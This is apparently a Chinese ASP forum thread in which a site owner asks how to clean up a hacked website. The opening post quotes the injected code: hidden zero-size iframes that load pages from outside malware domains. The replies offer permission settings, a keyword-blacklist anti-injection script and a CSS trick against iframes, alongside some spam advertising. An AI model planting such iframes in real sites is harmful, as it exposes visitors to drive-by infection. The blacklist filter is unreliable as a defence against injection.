网站被挂马怎么办?

biyiai 2008-01-12 05:14:15
<iFrame src=http://aaa.77xxmm.cn/new858.htm?075 width=0 name='6965' height=0></iframe><iframe src=http://AAA.1l1l1l.com/error/404.html wIdth=0 naMe='6965' heighT=0></iframe>

name='6965' 自动'数字'!

请大家解決了嗎?告诉我!
...全文
447 13 打赏 收藏 转发到动态 举报
写回复
用AI写文章
13 条回复
切换为时间正序
请发表友善的回复…
发表回复
amu1433 2010-06-12
  • 打赏
  • 举报
回复
权限问题 服务器上 不给他修改文件的权限 把修改权限给去掉 然后查找漏洞..修补漏洞 就行了 一半漏洞都是上次漏洞 或者注入漏洞

注入漏洞的话 在数据库文件中添加 如下代码
'--------SQL防注入定义部份------------------
Dim Fy_Post,Fy_Get,Fy_In,Fy_Inf,Fy_Xh
Fy_In = "or|注入的关键字 以竖线|隔开..么办法 CSDN屏蔽了 我也发不了"
Fy_Inf = split(Fy_In,"|")
'--------POST部份------------------
If Request.Form<>"" Then
For Each Fy_Post In Request.Form
For Fy_Xh=0 To Ubound(Fy_Inf)
If Instr(LCase(Request.Form(Fy_Post)),Fy_Inf(Fy_Xh))<>0 Then
Response.Write "<Script Language=JavaScript>alert('QQ群90316079:本此操作失败了!↓\n\n您提交的有非法字!');history.back();</Script>"
Response.End
End If
Next
Next
End If
yunfeng20 2010-06-12
  • 打赏
  • 举报
回复
可以使用明小子软件检测一下看有没有漏洞.

具体做法可以到http://www.yunfengshop.net/Topics/138.html这里看一下.
按照里面的方法做好了之后,一般都很难再被人挂马了!



工作室
chen_bruce 2010-06-11
  • 打赏
  • 举报
回复
10楼这丫的到哪发哪,你还累啊?楼主可用冰舞之类的软件检测下是否存在漏洞
zminghua 2009-06-24
  • 打赏
  • 举报
回复
给你个木马先把马给替换了,然后再给你一个防注入程序过虑一下.基本可以搞定.联系danlan_sky@126.com
canghai009 2009-06-24
  • 打赏
  • 举报
回复
你想交电脑界朋友嘛~我虽说称不上高手,但是对电脑的工作了如指掌,有空的朋友看看这个问题,我已经解决了,电脑开不开机,主机回转。但是显示器不会显示。http://net-ke.cn/0_5_101553.aspx
CainLai 2009-06-24
  • 打赏
  • 举报
回复
LZ要得是解决办法,我来帮顶等高人
vgy12304 2009-06-24
  • 打赏
  • 举报
回复
这个是典型的文件注入,主要是上传漏洞引起的。

根本上的解决办法:设置权限:

全站写保护(只读权限)
上传文件夹:写权限,禁止运行权限
sql字段过滤

绝对能根除这个注入,如果你的虚拟主机没这个功能的话,你就考虑换一个有足够管理权限的
xhj800311 2009-06-23
  • 打赏
  • 举报
回复
…………服务器的安全很重要的…………
明珠佩佩 2009-06-23
  • 打赏
  • 举报
回复
很明显是你服务器的安全存在问题
落日听风 2009-06-23
  • 打赏
  • 举报
回复
清网站代码,加防注入代码,防注入代码网上可以搜到
heyisheng 2009-06-22
  • 打赏
  • 举报
回复
这问题很严重,很明显是网站存在漏洞而被攻击了,若需要安全技术服务请联系EMAIL & MSN:yisheng@hotmail.com, 7X24 为您的网站和服务器保驾护航。
ledavie 2008-01-12
  • 打赏
  • 举报
回复
切断iframe里的请求 在CSS里加上 iframe{自定义属性:expression(this.src='about:blank',this.outerHTML='');}

28,391

社区成员

发帖
与我相关
我的任务
社区描述
ASP即Active Server Pages,是Microsoft公司开发的服务器端脚本环境。
社区管理员
  • ASP
  • 无·法
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧